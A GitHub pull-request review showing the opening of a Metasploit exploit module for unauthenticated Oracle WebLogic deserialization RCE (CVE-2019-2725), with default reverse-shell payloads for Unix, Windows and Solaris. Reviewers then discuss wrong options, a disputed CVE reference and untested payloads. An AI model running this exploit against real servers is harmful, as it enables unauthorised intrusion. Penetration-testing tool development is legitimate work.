modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb

```diff
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+        to execute code on the vulnerable host.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-2725'],
+          ['CNVD-C', '2019-48814'],
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
+          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
+        ],
+      'Privileged' => false,
+      'Platform' => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Arch' => [ARCH_X64, ARCH_X86],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
```

Comment:
It looks like I neglected to review this entire PR yet approved it. @wchen-r7 noticed that these options appear wrong. `URIPATH` does not appear to be used anywhere, being an `HttpServer` option, and `WSPATH` should be `TARGETURI`.

Reply:
A question has also been raised regarding the validity of the CVE reference. #11835

Reply:
Ah. So I'm actually in the middle ore reviewing the vulnerability, I can update the module (for the CVE and the datastore options) later. Thank you guys.

Reply:
Yes, please.

> wvu-r7 approved these changes 20 days ago

When I approved the changes, I was approving only the metadata I reviewed. Apologies for the misunderstanding.

Reply:
Oh, sorry, it's my fault, a little bit confused with this, this is not intentional, of course.
At this moment, I start testing and solve the problem of the payload...
In a couple of hours, I'll be giving updates of the matter.

Reply:
@acamro To be honest, I'm not so confident about the CVE update to CVE-2017-10271. There are other CVE-2019-2725 PoCs that look very similar to yours. Exactly what's the difference between these two? Do you know?

Reply:
I'm verifying and could be the payload to exploit, WebLogic and Java have some blacklisted types that mitigate some payloads, in this case, I shouldn't have used a StringBuilder datatype, the real problem was simply a lack of testing (patched versions).